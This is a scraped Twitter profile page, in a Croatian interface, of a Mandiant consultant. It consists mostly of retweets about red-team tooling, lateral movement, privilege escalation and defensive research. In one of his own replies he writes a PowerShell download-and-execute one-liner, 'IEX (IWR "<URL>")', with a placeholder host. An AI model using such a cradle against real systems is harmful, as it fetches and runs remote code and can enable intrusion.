Twitter | Pretraživanje | |
James Hovious
Consultant at Mandiant
3.574
Tweetovi
454
Pratim
317
Osobe koje vas prate
 
Prikaži više fotografija
Tweetovi
James Hovious proslijedio/la je tweet
n00py 3 h
I had some fun exploiting LDAP this week. I'm far from an LDAP expert, so please, bear with me as I try to make some sense of how I went to went from what seemed to be near complete lockdown to owning the domain.
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
く̱͕̘͚ず̡̭̠ 6 h
It was my pleasure to work on this with and , two excellent analysts. Malware analysis provided by the awesome .
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Ryan Hausknecht 3. velj
I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Marcello 3. velj
Really glad to finally get a blogpost out about this. Hopefully this is useful and gives Red Teamers ideas on how to use the BYOI concept in their own payloads. If anyone is interested in a few more follow up posts about this will gladly oblige :)
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Marcello 1. velj
For anyone wondering, yes it’s written in C# and yes I will be totally adding it as a SILENTTRINITY module if I can get the source code (a few changes need to be made in order for it to run in memory).
Prikaži podatke · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
PuddlePirate 30. sij
Wow, long time coming Happy for the result, still not happy with how it was handled by authorities. And the winner in all this? Attorneys
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
invictus 30. sij
On successful compromise of the user endpoint, the red team deployed their ultimate weapon
Prikaži podatke · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
profdeibert 28. sij
Our new report out now: "Stopping the Press: Journalist Targeted by Saudi-linked Pegasus Spyware Operator".
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious 29. sij
Odgovor korisniku/ci @gynvael
I think IEX (IWR "<URL>") is the shortest I know of (PSv3). If you can host something like PowerCat locally
Prikaz razgovora · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
ʎppɐɯɔ 29. sij
We have just pushed some *big* updates to Ghostwriter's master branch that I think you'll like. We've got WYSIWIG editors, autocomplete, new reports, and more! Check it out:
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Sean Wright 28. sij
New tool to play with 😀 For those who may not be aware, there is a new Nessus licence called Nessus Essentials, which is a free copy of Nessus!
Prikaz fotografije · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Red Canary 28. sij
From the folks that brought you Atomic Red Team, Chain Reactor is a new open source framework for composing executables that simulate adversary behaviors and techniques on Linux endpoints.
Prikaz fotografije · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Steven 27. sij
Move Faster, Stay Longer blog about extending CS and tools to go with it.
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Matthew Seyer 27. sij
The event, usn, and mft listeners are now all in one spot and better than ever! Get them all here:
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
ippsec 24. sij
Starting to put together a Linux Privesc Video. Can anyone spot something non-network that I'm missing? - Recon (linPEAS/LinEnum) - Sudo - Permission Overview (file writes - sshKey/cron) - SetUID - Kernel - Cron - Network [mysql, postgres, erlang cookie (couchDb)]
Prikaži podatke · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Mandiant 23. sij
If you've completed our Endpoint Security Deployment course, expand your knowledge and skills by learning the fundamentals of live analysis forensics and investigation for . >> Sign up:
Prikaz fotografije · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Scott Cutler 23. sij
I wrote a secret scanner tool and published it under my employer's GitHub org. Since I don't have much Twitter reach I appreciate any RTs! It currently will scrape Git, S3, and GDocs for secrets, and written in Rust for high performance.
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
SpecterOps 22. sij
New from - Revisiting Remote Desktop Lateral Movement This post discusses RDP lateral movement by leveraging mstscax.dll. Steven also is releasing SharpRDP with corresponding detection guidance for this attack technique. Post:
Prikaz sažetka · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
Joe Vest 22. sij
Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public.
Prikaži podatke · Reply Retweet Označi sa "sviđa mi se"
James Hovious proslijedio/la je tweet
SpecterOps 22. sij
Despite its incredible security enhancements, PowerShell continues to be abused by adversaries. A strong knowledge of PowerShell enables defenders to effectively manage and respond to its abuse. (1/4)
Prikaži podatke · Reply Retweet Označi sa "sviđa mi se"
Učitaj starije tweetove